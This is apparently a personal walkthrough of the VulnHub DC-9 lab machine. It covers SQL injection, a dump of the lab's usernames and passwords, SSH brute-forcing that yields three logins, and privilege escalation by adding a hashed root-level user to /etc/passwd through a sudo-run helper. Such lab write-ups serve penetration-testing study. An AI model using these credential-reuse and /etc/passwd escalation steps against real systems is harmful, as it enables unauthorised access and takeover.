vulnhub-22-dc-9 - My-oscp-all-things

ipaddress:192.168.56.19 ### information_gathering open-port:80 find sql injection: ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609397539579-f2a8180c-e460-4859-8552-7112d29aa3b3.png#align=left&display=inline&height=555&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1110&originWidth=2020&size=100529&status=done&style=none&width=1010) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609397552701-17eb650d-dcd3-4c38-a8bb-22c3dde378c3.png#align=left&display=inline&height=664&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1328&originWidth=1364&size=171061&status=done&style=none&width=682) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609397522521-a1abf61a-d4ae-41d0-8599-5fb1c60289a1.png#align=left&display=inline&height=737&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1474&originWidth=2498&size=975968&status=done&style=none&width=1249) user:marym julied fredf barneyr tomc jerrym wilmaf bettyr chandlerb joeyt rachelg rossg monicag phoebeb scoots janitor janitor2 pass: | 3kfs86sfd | | --- | | 468sfdfsd2 | | 4sfd87sfd1 | | RocksOff | | TC&TheBoyz | | B8m#48sd | | Pebbles | | BamBam01 | | UrAG0D! | | Passw0rd | | yN72#dsd | | ILoveRachel | | 3248dsds7s | | smellycats | | YR3BVxxxw87 | | Ilovepeepee | | Hawaii-Five-0 | ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609398386385-9e490722-237a-497d-9e46-b8346a8ec63f.png#align=left&display=inline&height=285&margin=%5Bobject%20Object%5D&name=image.png&originHeight=570&originWidth=2316&size=240874&status=done&style=none&width=1158) admin transorbital1 在后台并没什么发现，于是转向ssh ### Establish a foothold ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609398811981-b72a4ef0-2f10-433d-8efd-144373bf1364.png#align=left&display=inline&height=83&margin=%5Bobject%20Object%5D&name=image.png&originHeight=166&originWidth=1374&size=97749&status=done&style=none&width=687) 得到三个账户： ``` chandlerb:UrAG0D! joeyt:Passw0rd janitor:Ilovepeepee ``` janitor find some password: ... joeyt nothing can find some so i add the pwd to ssh_pwd to brute again: ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609400712189-0636bd17-31cf-42d7-ae70-a9697b833627.png#align=left&display=inline&height=129&margin=%5Bobject%20Object%5D&name=image.png&originHeight=258&originWidth=1422&size=135709&status=done&style=none&width=711) go on~: ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609400835771-fe1630a9-84ea-46e1-8cc2-6885b8fcf88c.png#align=left&display=inline&height=421&margin=%5Bobject%20Object%5D&name=image.png&originHeight=842&originWidth=2106&size=362343&status=done&style=none&width=1053) ![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609401139389-11190a0e-e544-4165-afde-e0fd32c10f73.png#align=left&display=inline&height=294&margin=%5Bobject%20Object%5D&name=image.png&originHeight=588&originWidth=2016&size=89522&status=done&style=none&width=1008) ``` openssl passwd -1 -salt gits password ``` ``` $1$gits$zyQ/0nRnnKb7vab/jPE.I1 ``` ``` /tmp/hackin sudo ./test /tmp/hackin /etc/passwd su git passwd is toor ```